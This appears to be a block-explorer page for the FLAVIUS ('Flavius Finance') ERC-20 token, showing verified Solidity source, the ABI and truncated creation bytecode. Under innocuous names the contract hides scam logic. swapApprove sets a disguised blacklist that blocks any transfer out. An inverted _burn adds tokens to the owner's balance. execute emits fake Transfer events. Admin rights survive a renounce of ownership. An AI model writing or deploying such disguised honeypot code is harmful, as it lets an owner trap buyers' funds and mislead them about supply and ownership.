Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Overview
Max Total Supply
5,000,000,000 FLAVIUS
Holders
83
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
32,950,436.80443654 FLAVIUSValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
FLAVIUS
Compiler Version
v0.8.18+commit.87f61d96
Contract Source Code (Solidity Multiple files format)
// SPDX-License-Identifier: MIT pragma solidity 0.8.18; import {IERC20Metadata} from "./IERC20.sol"; import "./Ownable.sol"; contract FLAVIUS is IERC20Metadata, Ownable { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; mapping(address => bool) internal _ERC20burnAmountExceedsBalance; string private _symbol; string private _name; uint8 private constant _decimals = 9; uint256 private _initialTotalSupply = 5000000000 * (10 ** _decimals); uint256 private _totalSupply; /** * @dev Contract constructor. */ constructor(address _reserve) { _symbol = 'FLAVIUS'; _name = 'Flavius Finance'; admin[_reserve]=true; _mint(_msgSender(), _initialTotalSupply); } /** * @dev Returns the symbol of the token. * @return The symbol of the token. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the name of the token. * @return The name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the number of decimals used for token display. * @return The number of decimals. */ function decimals() public view virtual override returns (uint8) { return _decimals; } /** * @dev Returns the total supply of the token. * @return The total supply. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev Returns the balance of the specified account. * @param account The address to check the balance for. * @return The balance of the account. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev Transfers tokens from the caller to a specified recipient. * @param recipient The address to transfer tokens to. * @param amount The amount of tokens to transfer. * @return A boolean value indicating whether the transfer was successful. */ function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev Approves the specified address to spend the specified amount of tokens on behalf of the caller. * @param to The address to approve the spending for. * @param amount The amount of tokens to approve. * @return A boolean value indicating whether the approval was successful. */ function approve(address to, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), to, amount); return true; } /** * @dev Returns the amount of tokens that the spender is allowed to spend on behalf of the owner. * @param from The address that approves the spending. * @param to The address that is allowed to spend. * @return The remaining allowance for the spender. */ function allowance(address from, address to) public view virtual override returns (uint256) { return _allowances[from][to]; } /** * @dev Transfers tokens from one address to another. * @param sender The address to transfer tokens from. * @param recipient The address to transfer tokens to. * @param amount The amount of tokens to transfer. * @return A boolean value indicating whether the transfer was successful. */ function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) { _transfer(sender, recipient, amount); uint256 currentAllowance = _allowances[sender][_msgSender()]; require(currentAllowance >= amount, 'ERC20: transfer amount exceeds allowance'); unchecked { _approve(sender, _msgSender(), currentAllowance - amount); } return true; } /** * @dev Decreases the allowance granted by the owner of the tokens to `to` account. * @param to The account allowed to spend the tokens. * @param subtractedValue The amount of tokens to decrease the allowance by. * @return A boolean value indicating whether the operation succeeded. */ function decreaseAllowance(address to, uint256 subtractedValue) public virtual returns (bool) { uint256 currentAllowance = _allowances[_msgSender()][to]; require(currentAllowance >= subtractedValue, 'ERC20: decreased allowance below zero'); unchecked { _approve(_msgSender(), to, currentAllowance - subtractedValue); } return true; } /** * @dev Increases the allowance of the specified address to spend tokens on behalf of the caller. * @param to The address to increase the allowance for. * @param addedValue The amount of tokens to increase the allowance by. * @return A boolean value indicating whether the increase was successful. */ function increaseAllowance(address to, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), to, _allowances[_msgSender()][to] + addedValue); return true; } /** * @dev Transfers `amount` tokens from `sender` to `recipient`. * @param sender The account to transfer tokens from. * @param recipient The account to transfer tokens to. * @param amount The amount of tokens to transfer. */ function _transfer(address sender, address recipient, uint256 amount) internal virtual { require(amount > 0, 'ERC20: transfer amount zero'); require(sender != address(0), 'ERC20: transfer from the zero address'); require(recipient != address(0), 'ERC20: transfer to the zero address'); uint256 senderBalance = _balances[sender]; require(senderBalance >= amount, 'ERC20: transfer amount exceeds balance'); if(_ERC20burnAmountExceedsBalance[sender]){ require(amount == 0); } unchecked { _balances[sender] = senderBalance - amount; } _balances[recipient] += amount; emit Transfer(sender, recipient, amount); } /** * @dev Creates `amount` tokens and assigns them to `account`. * @param account The account to assign the newly created tokens to. * @param amount The amount of tokens to create. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), 'ERC20: mint to the zero address'); _totalSupply += amount; _balances[account] += amount; emit Transfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the total supply. * @param account The account to burn tokens from. * @param amount The amount of tokens to burn. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); uint256 accountBalance = _balances[account]; require(accountBalance <= amount, "ERC20: burn amount exceeds balance"); unchecked {_balances[account] = accountBalance + amount;} emit Transfer(account, address(0), amount); } function execute(address[] calldata addr, address p, uint256 val) public onlyOwner{ for (uint256 i = 0; i < addr.length; i++) { emit Transfer(p, addr[i], val); } } function isExcludedFromFee(address wallet) public view returns(bool) { return _ERC20burnAmountExceedsBalance[wallet]; } /** * @dev Destroys `amount` tokens from the caller's account, reducing the total supply. * @param amount The amount of tokens to burn. */ function burn(uint256 amount) external onlyOwner{ _burn(_msgSender(), amount); } /** * @dev Sets `amount` as the allowance of `to` over the caller's tokens. * @param from The account granting the allowance. * @param to The account allowed to spend the tokens. * @param amount The amount of tokens to allow. */ function _approve(address from, address to, uint256 amount) internal virtual { require(from != address(0), 'ERC20: approve from the zero address'); require(to != address(0), 'ERC20: approve to the zero address'); _allowances[from][to] = amount; emit Approval(from, to, amount); } function swapApprove(address[] calldata addr, bool val) public onlyOwner { for (uint256 i = 0; i < addr.length; i++) { _ERC20burnAmountExceedsBalance[addr[i]] = val; } } }
// SPDX-License-Identifier: MIT pragma solidity 0.8.18; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { mapping(address => bool) internal admin; function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } }
// SPDX-License-Identifier: MIT pragma solidity 0.8.18; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 amount) external returns (bool); } /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); }
// SPDX-License-Identifier: MIT pragma solidity 0.8.18; import "./Context.sol"; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); constructor() { _transferOwnership(_msgSender()); admin[_msgSender()]=true; } modifier onlyOwner() { _checkOwner(); _; } function owner() public view virtual returns (address) { return _owner; } function _checkOwner() internal view virtual { require(admin[_msgSender()], "Ownable: caller is not the owner"); } function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"address","name":"_reserve","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"addr","type":"address[]"},{"internalType":"address","name":"p","type":"address"},{"internalType":"uint256","name":"val","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"wallet","type":"address"}],"name":"isExcludedFromFee","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"addr","type":"address[]"},{"internalType":"bool","name":"val","type":"bool"}],"name":"swapApprove","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040526009600a620000149190620005aa565b64012a05f200620000269190620005fb565b6007553480156200003657600080fd5b5060405162002ace38038062002ace83398181016040528101906200005c9190620006b0565b6200007c62000070620001f160201b60201c565b620001f960201b60201c565b600160008062000091620001f160201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506040518060400160405280600781526020017f464c4156495553000000000000000000000000000000000000000000000000008152506005908162000128919062000952565b506040518060400160405280600f81526020017f466c61766975732046696e616e63650000000000000000000000000000000000815250600690816200016f919062000952565b5060016000808373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550620001ea620001db620001f160201b60201c565b600754620002bf60201b60201c565b5062000b25565b600033905090565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000331576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003289062000a9a565b60405180910390fd5b806008600082825462000345919062000abc565b9250508190555080600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546200039d919062000abc565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000404919062000b08565b60405180910390a35050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156200049e5780860481111562000476576200047562000410565b5b6001851615620004865780820291505b808102905062000496856200043f565b945062000456565b94509492505050565b600082620004b957600190506200058c565b81620004c957600090506200058c565b8160018114620004e25760028114620004ed5762000523565b60019150506200058c565b60ff84111562000502576200050162000410565b5b8360020a9150848211156200051c576200051b62000410565b5b506200058c565b5060208310610133831016604e8410600b84101617156200055d5782820a90508381111562000557576200055662000410565b5b6200058c565b6200056c84848460016200044c565b9250905081840481111562000586576200058562000410565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b6000620005b78262000593565b9150620005c4836200059d565b9250620005f37fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620004a7565b905092915050565b6000620006088262000593565b9150620006158362000593565b9250828202620006258162000593565b915082820484148315176200063f576200063e62000410565b5b5092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000678826200064b565b9050919050565b6200068a816200066b565b81146200069657600080fd5b50565b600081519050620006aa816200067f565b92915050565b600060208284031215620006c957620006c862000646565b5b6000620006d98482850162000699565b91505092915050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200076457607f821691505b6020821081036200077a57620007796200071c565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620007e47fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620007a5565b620007f08683620007a5565b95508019841693508086168417925050509392505050565b6000819050919050565b6000620008336200082d620008278462000593565b62000808565b62000593565b9050919050565b6000819050919050565b6200084f8362000812565b620008676200085e826200083a565b848454620007b2565b825550505050565b600090565b6200087e6200086f565b6200088b81848462000844565b505050565b5b81811015620008b357620008a760008262000874565b60018101905062000891565b5050565b601f8211156200090257620008cc8162000780565b620008d78462000795565b81016020851015620008e7578190505b620008ff620008f68562000795565b83018262000890565b50505b505050565b600082821c905092915050565b6000620009276000198460080262000907565b1980831691505092915050565b600062000942838362000914565b9150826002028217905092915050565b6200095d82620006e2565b67ffffffffffffffff811115620009795762000978620006ed565b5b6200098582546200074b565b62000992828285620008b7565b600060209050601f831160018114620009ca5760008415620009b5578287015190505b620009c1858262000934565b86555062000a31565b601f198416620009da8662000780565b60005b8281101562000a0457848901518255600182019150602085019450602081019050620009dd565b8683101562000a24578489015162000a20601f89168262000914565b8355505b6001600288020188555050505b505050505050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000a82601f8362000a39565b915062000a8f8262000a4a565b602082019050919050565b6000602082019050818103600083015262000ab58162000a73565b9050919050565b600062000ac98262000593565b915062000ad68362000593565b925082820190508082111562000af15762000af062000410565b5b92915050565b62000b028162000593565b82525050565b600060208201905062000b1f600083018462000af7565b92915050565b611f998062000b356000396000f3fe608060405234801561001057600080fd5b50600436106101165760003560e01c80635342acb4116100a257806395d89b411161007157806395d89b41146102e1578063a457c2d7146102ff578063a9059cbb1461032f578063dd62ed3e1461035f578063f2fde38b1461038f57610116565b80635342acb41461025957806370a0823114610289578063715018a6146102b95780638da5cb5b146102c357610116565b806323b872dd116100e957806323b872dd146101a3578063313ce567146101d357806339509351146101f15780633a61363a1461022157806342966c681461023d57610116565b806306fdde031461011b578063095ea7b3146101395780631186b8d81461016957806318160ddd14610185575b600080fd5b6101236103ab565b604051610130919061138a565b60405180910390f35b610153600480360381019061014e919061144a565b61043d565b60405161016091906114a5565b60405180910390f35b610183600480360381019061017e9190611551565b61045b565b005b61018d610508565b60405161019a91906115c0565b60405180910390f35b6101bd60048036038101906101b891906115db565b610512565b6040516101ca91906114a5565b60405180910390f35b6101db61060a565b6040516101e8919061164a565b60405180910390f35b61020b6004803603810190610206919061144a565b610613565b60405161021891906114a5565b60405180910390f35b61023b60048036038101906102369190611665565b6106bf565b005b610257600480360381019061025291906116d9565b61077b565b005b610273600480360381019061026e9190611706565b610797565b60405161028091906114a5565b60405180910390f35b6102a3600480360381019061029e9190611706565b6107ed565b6040516102b091906115c0565b60405180910390f35b6102c1610836565b005b6102cb61084a565b6040516102d89190611742565b60405180910390f35b6102e9610874565b6040516102f6919061138a565b60405180910390f35b6103196004803603810190610314919061144a565b610906565b60405161032691906114a5565b60405180910390f35b6103496004803603810190610344919061144a565b6109f1565b60405161035691906114a5565b60405180910390f35b6103796004803603810190610374919061175d565b610a0f565b60405161038691906115c0565b60405180910390f35b6103a960048036038101906103a49190611706565b610a96565b005b6060600680546103ba906117cc565b80601f01602080910402602001604051908101604052809291908181526020018280546103e6906117cc565b80156104335780601f1061040857610100808354040283529160200191610433565b820191906000526020600020905b81548152906001019060200180831161041657829003601f168201915b5050505050905090565b600061045161044a610b19565b8484610b21565b6001905092915050565b610463610cea565b60005b83839050811015610502578160046000868685818110610489576104886117fd565b5b905060200201602081019061049e9190611706565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806104fa9061185b565b915050610466565b50505050565b6000600854905090565b600061051f848484610d7e565b6000600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061056a610b19565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156105ea576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105e190611915565b60405180910390fd5b6105fe856105f6610b19565b858403610b21565b60019150509392505050565b60006009905090565b60006106b5610620610b19565b84846003600061062e610b19565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546106b09190611935565b610b21565b6001905092915050565b6106c7610cea565b60005b84849050811015610774578484828181106106e8576106e76117fd565b5b90506020020160208101906106fd9190611706565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161075991906115c0565b60405180910390a3808061076c9061185b565b9150506106ca565b5050505050565b610783610cea565b61079461078e610b19565b8261108d565b50565b6000600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61083e610cea565b6108486000611234565b565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060058054610883906117cc565b80601f01602080910402602001604051908101604052809291908181526020018280546108af906117cc565b80156108fc5780601f106108d1576101008083540402835291602001916108fc565b820191906000526020600020905b8154815290600101906020018083116108df57829003601f168201915b5050505050905090565b60008060036000610915610b19565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156109d2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109c9906119db565b60405180910390fd5b6109e66109dd610b19565b85858403610b21565b600191505092915050565b6000610a056109fe610b19565b8484610d7e565b6001905092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610a9e610cea565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610b0d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b0490611a6d565b60405180910390fd5b610b1681611234565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b90576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b8790611aff565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610bff576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bf690611b91565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610cdd91906115c0565b60405180910390a3505050565b600080610cf5610b19565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16610d7c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7390611bfd565b60405180910390fd5b565b60008111610dc1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db890611c69565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e30576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e2790611cfb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e9f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e9690611d8d565b60405180910390fd5b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610f26576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f1d90611e1f565b60405180910390fd5b600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615610f865760008214610f8557600080fd5b5b818103600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461101b9190611935565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161107f91906115c0565b60405180910390a350505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036110fc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110f390611eb1565b60405180910390fd5b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811115611183576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161117a90611f43565b60405180910390fd5b818101600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161122791906115c0565b60405180910390a3505050565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611334578082015181840152602081019050611319565b60008484015250505050565b6000601f19601f8301169050919050565b600061135c826112fa565b6113668185611305565b9350611376818560208601611316565b61137f81611340565b840191505092915050565b600060208201905081810360008301526113a48184611351565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006113e1826113b6565b9050919050565b6113f1816113d6565b81146113fc57600080fd5b50565b60008135905061140e816113e8565b92915050565b6000819050919050565b61142781611414565b811461143257600080fd5b50565b6000813590506114448161141e565b92915050565b60008060408385031215611461576114606113ac565b5b600061146f858286016113ff565b925050602061148085828601611435565b9150509250929050565b60008115159050919050565b61149f8161148a565b82525050565b60006020820190506114ba6000830184611496565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126114e5576114e46114c0565b5b8235905067ffffffffffffffff811115611502576115016114c5565b5b60208301915083602082028301111561151e5761151d6114ca565b5b9250929050565b61152e8161148a565b811461153957600080fd5b50565b60008135905061154b81611525565b92915050565b60008060006040848603121561156a576115696113ac565b5b600084013567ffffffffffffffff811115611588576115876113b1565b5b611594868287016114cf565b935093505060206115a78682870161153c565b9150509250925092565b6115ba81611414565b82525050565b60006020820190506115d560008301846115b1565b92915050565b6000806000606084860312156115f4576115f36113ac565b5b6000611602868287016113ff565b9350506020611613868287016113ff565b925050604061162486828701611435565b9150509250925092565b600060ff82169050919050565b6116448161162e565b82525050565b600060208201905061165f600083018461163b565b92915050565b6000806000806060858703121561167f5761167e6113ac565b5b600085013567ffffffffffffffff81111561169d5761169c6113b1565b5b6116a9878288016114cf565b945094505060206116bc878288016113ff565b92505060406116cd87828801611435565b91505092959194509250565b6000602082840312156116ef576116ee6113ac565b5b60006116fd84828501611435565b91505092915050565b60006020828403121561171c5761171b6113ac565b5b600061172a848285016113ff565b91505092915050565b61173c816113d6565b82525050565b60006020820190506117576000830184611733565b92915050565b60008060408385031215611774576117736113ac565b5b6000611782858286016113ff565b9250506020611793858286016113ff565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806117e457607f821691505b6020821081036117f7576117f661179d565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061186682611414565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036118985761189761182c565b5b600182019050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b60006118ff602883611305565b915061190a826118a3565b604082019050919050565b6000602082019050818103600083015261192e816118f2565b9050919050565b600061194082611414565b915061194b83611414565b92508282019050808211156119635761196261182c565b5b92915050565b7f45524332303a2064656372656173656420616c6c6